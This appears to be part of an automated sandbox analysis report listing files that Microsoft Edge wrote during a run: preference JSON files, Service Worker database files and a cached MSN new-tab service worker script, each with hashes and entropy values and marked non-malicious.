                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):9713
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.118559250418208
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:stOkdpXs2JtsZihUkegEp8wbV+FVTQA66WYaFIMYCP7YJ:stOQXsatfhG/bGFQx6WYaTYP
                                                                                                                                                                                                                                                                                                                                MD5:209922C7808AAEC3E9BE7CB0971AB4BC
                                                                                                                                                                                                                                                                                                                                SHA1:201DA534D051552C34B68F2B0F31AFF03A61B965
                                                                                                                                                                                                                                                                                                                                SHA-256:E0090F0E50F8F297230086DAA8D49116542E17724C0280D6ABCF9BD50A9FDD03
                                                                                                                                                                                                                                                                                                                                SHA-512:C3122B0CDFE0979EA61A27C25B98AEAE1B3294A4AE2D1945CBF43BF18A59FAA30AFE2825C52F7A725939617AA9A0654C923460FB22F8E267BFD7B6F946C822D0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13374622940285595","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3bd65.TMP (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):9713
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.118559250418208
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:stOkdpXs2JtsZihUkegEp8wbV+FVTQA66WYaFIMYCP7YJ:stOQXsatfhG/bGFQx6WYaTYP
                                                                                                                                                                                                                                                                                                                                MD5:209922C7808AAEC3E9BE7CB0971AB4BC
                                                                                                                                                                                                                                                                                                                                SHA1:201DA534D051552C34B68F2B0F31AFF03A61B965
                                                                                                                                                                                                                                                                                                                                SHA-256:E0090F0E50F8F297230086DAA8D49116542E17724C0280D6ABCF9BD50A9FDD03
                                                                                                                                                                                                                                                                                                                                SHA-512:C3122B0CDFE0979EA61A27C25B98AEAE1B3294A4AE2D1945CBF43BF18A59FAA30AFE2825C52F7A725939617AA9A0654C923460FB22F8E267BFD7B6F946C822D0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13374622940285595","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3ffed.TMP (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):9713
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.118559250418208
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:stOkdpXs2JtsZihUkegEp8wbV+FVTQA66WYaFIMYCP7YJ:stOQXsatfhG/bGFQx6WYaTYP
                                                                                                                                                                                                                                                                                                                                MD5:209922C7808AAEC3E9BE7CB0971AB4BC
                                                                                                                                                                                                                                                                                                                                SHA1:201DA534D051552C34B68F2B0F31AFF03A61B965
                                                                                                                                                                                                                                                                                                                                SHA-256:E0090F0E50F8F297230086DAA8D49116542E17724C0280D6ABCF9BD50A9FDD03
                                                                                                                                                                                                                                                                                                                                SHA-512:C3122B0CDFE0979EA61A27C25B98AEAE1B3294A4AE2D1945CBF43BF18A59FAA30AFE2825C52F7A725939617AA9A0654C923460FB22F8E267BFD7B6F946C822D0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13374622940285595","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF47f00.TMP (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):9713
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.118559250418208
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:stOkdpXs2JtsZihUkegEp8wbV+FVTQA66WYaFIMYCP7YJ:stOQXsatfhG/bGFQx6WYaTYP
                                                                                                                                                                                                                                                                                                                                MD5:209922C7808AAEC3E9BE7CB0971AB4BC
                                                                                                                                                                                                                                                                                                                                SHA1:201DA534D051552C34B68F2B0F31AFF03A61B965
                                                                                                                                                                                                                                                                                                                                SHA-256:E0090F0E50F8F297230086DAA8D49116542E17724C0280D6ABCF9BD50A9FDD03
                                                                                                                                                                                                                                                                                                                                SHA-512:C3122B0CDFE0979EA61A27C25B98AEAE1B3294A4AE2D1945CBF43BF18A59FAA30AFE2825C52F7A725939617AA9A0654C923460FB22F8E267BFD7B6F946C822D0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13374622940285595","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):30243
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.566437382706385
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:ZSAYHA7pLGLpu/WPCwf4T8F1+UoAYDCx9Tuqh0VfUC9xbog/OVfIvCIyhsrwMk8g:ZSAYHMcpu/WPCwf4Tu1ja+IvChhFMkm4
                                                                                                                                                                                                                                                                                                                                MD5:8A92EEF98B82E232847E54DE5058C33A
                                                                                                                                                                                                                                                                                                                                SHA1:3DAF8687A67F3A0A42513F1D5A05B746062F0C3C
                                                                                                                                                                                                                                                                                                                                SHA-256:ABC8E0DA3BE390EC9F1E47E3AADCEC092499BEB89E3AA72D803959524812D130
                                                                                                                                                                                                                                                                                                                                SHA-512:BCD8ACC5A10F5A32152400AC80E734AA058976D517EF62A6E80C51221926E264DBBEA29A613578BC3D114E753336AB9AC7238E6FC5B2C3A4DA94A1CC01F7F740
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13374622939649808","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13374622939649808","location":5,"ma

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3bd75.TMP (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):30243
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.566437382706385
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:ZSAYHA7pLGLpu/WPCwf4T8F1+UoAYDCx9Tuqh0VfUC9xbog/OVfIvCIyhsrwMk8g:ZSAYHMcpu/WPCwf4Tu1ja+IvChhFMkm4
                                                                                                                                                                                                                                                                                                                                MD5:8A92EEF98B82E232847E54DE5058C33A
                                                                                                                                                                                                                                                                                                                                SHA1:3DAF8687A67F3A0A42513F1D5A05B746062F0C3C
                                                                                                                                                                                                                                                                                                                                SHA-256:ABC8E0DA3BE390EC9F1E47E3AADCEC092499BEB89E3AA72D803959524812D130
                                                                                                                                                                                                                                                                                                                                SHA-512:BCD8ACC5A10F5A32152400AC80E734AA058976D517EF62A6E80C51221926E264DBBEA29A613578BC3D114E753336AB9AC7238E6FC5B2C3A4DA94A1CC01F7F740
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13374622939649808","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13374622939649808","location":5,"ma

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2174
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.8612234534027285
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:F2xc5NmhccncmokCROulg2DxFfRHI7CROulg2oSuZCROulg2DxIRHI6CROulg2E2:F2emhledDxFfB9doHMdDxIBUdEIBz
                                                                                                                                                                                                                                                                                                                                MD5:B4857FD077C6B33B256F2B48F63A7C4C
                                                                                                                                                                                                                                                                                                                                SHA1:D21D1042C062F1DF445608F1AC25688BB50A7092
                                                                                                                                                                                                                                                                                                                                SHA-256:2C6C004E0B01C79230A4ED77ED155B6042FE9FB48C1D2BAD29FD181FE8776E9D
                                                                                                                                                                                                                                                                                                                                SHA-512:36CF39D266A3727D393D0514175A781641496F9182A51F93D23CDD034F04FFC8B202A9CB0E7336CACE1E35BB6AF49E77EE067B43F05B302F5FF62EEE784C7444
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2..?.1................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true .(.0.8......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayo

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):299
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.1738101641830285
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:yjy1923oH+TcwtE/a252KLlkjkGq2P923oH+TcwtE/a2ZIFUv:Y3Yeb8xLgkGv4Yeb8J2FUv
                                                                                                                                                                                                                                                                                                                                MD5:76B0399B2A8EE31715C4D3160C537553
                                                                                                                                                                                                                                                                                                                                SHA1:FBF0C2251B039782999825C954E69AB73B5D7BF5
                                                                                                                                                                                                                                                                                                                                SHA-256:90B5DE8116ABFA7918C835C36D63903ECA55E0F25505C90D16BF3ECE695E037E
                                                                                                                                                                                                                                                                                                                                SHA-512:24431A5828920E4B96D0C9698C5705C53F3BD02ACC377D5DF9BDBF9398C88BFFDB16612E5EA53277A75DF7C9B29C205D2974CAC938BCC6E08FBF65876066BAD7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:49.453 1d20 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/10/28-17:02:49.574 1d20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):113138
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.5785947617655935
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:UU906yxPXfOxr1lhCe1A46rCjQ3NG4CDHjmIZwi8L/r4L/rU0:59LyxPXfOxr1lMe1Z6rFoDmThL/ML/b
                                                                                                                                                                                                                                                                                                                                MD5:94427EF9B039FDCE721349E5D42C1154
                                                                                                                                                                                                                                                                                                                                SHA1:88665A1BB745E22B9A21EDCA5DE0756CF7FE7A05
                                                                                                                                                                                                                                                                                                                                SHA-256:BC8459F7A5960ACE2EA172FD927FF56D0CF2783D7C2468A06ACA1AB50EE2B695
                                                                                                                                                                                                                                                                                                                                SHA-512:DBE0DAFDFB9F84573182F909DD3DD65E4645CB4084276EC788C2D5376BD4B7954B4F070EDE6479E0930D9AE1370094AC13CBA305A5209EFF0E76FD9CB53735A6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):187217
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.379946418814347
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:xDgy3Mh6tsmKwlLY3X8jdNEb9P3avpwiBHg0xpL/pNcMB5:kmKwl8XSSbqLBAUpL/UY
                                                                                                                                                                                                                                                                                                                                MD5:F86D3050BD6B7574EACFBF748A1E17DC
                                                                                                                                                                                                                                                                                                                                SHA1:3513245FB203CB566CE98269EA8159B9DD261CDB
                                                                                                                                                                                                                                                                                                                                SHA-256:C6206FDEC4A6C9E3DEF34E8FDEF7A2FCA5C4ADED32BA4EA23C7CDD8A5597FC0B
                                                                                                                                                                                                                                                                                                                                SHA-512:DC8C23702F5F9091CD8DD62B53F17C1B220B5273991FD5B0DD2B4B0C559088F2F7F973BAA777766C555F9A44E19E7B4DDE92654FF2083402BB81FF1CE45ADBBE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:0\r..m..........rSG.....0....z3.................;....x..........,T.8..`,.....L`.....,T...`......L`......Rc.4.9....exports...Rc..W....module....RcZ.TL....define....Rb.wS.....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H......Q.Q.M....jD...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=truea........Db............D`.....A..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....O...,T.`.`z.....L`..........a............a.........Dr8................/....-.......}....4.........../...-..........\....-..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):24
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                                                MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                                                SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                                                SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                                                SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:0\r..m..................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:PXPXQyXl/ld/lxEwlt/lhKl:nzuQMl
                                                                                                                                                                                                                                                                                                                                MD5:D4C72F65FF522913BB81AF038762FC21
                                                                                                                                                                                                                                                                                                                                SHA1:FC8F72B66E39C56A007AED816C93EA5AE6CF5AB3
                                                                                                                                                                                                                                                                                                                                SHA-256:26945B52D7634B985568BAC7018D9250A2AD35F3DC35E7FDA1330744C3082B66
                                                                                                                                                                                                                                                                                                                                SHA-512:828AB95A83329F3BBA1B385C3E1878AAA85146CF700C5C97F79CAFD1FBEF779B6FCCB24C7CE229E3E11C63ABC937B12DBBCED4C02DDC40DB71E0FA9022A4720D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:@...z2j.oy retne.........................X....,................(.*.&./.

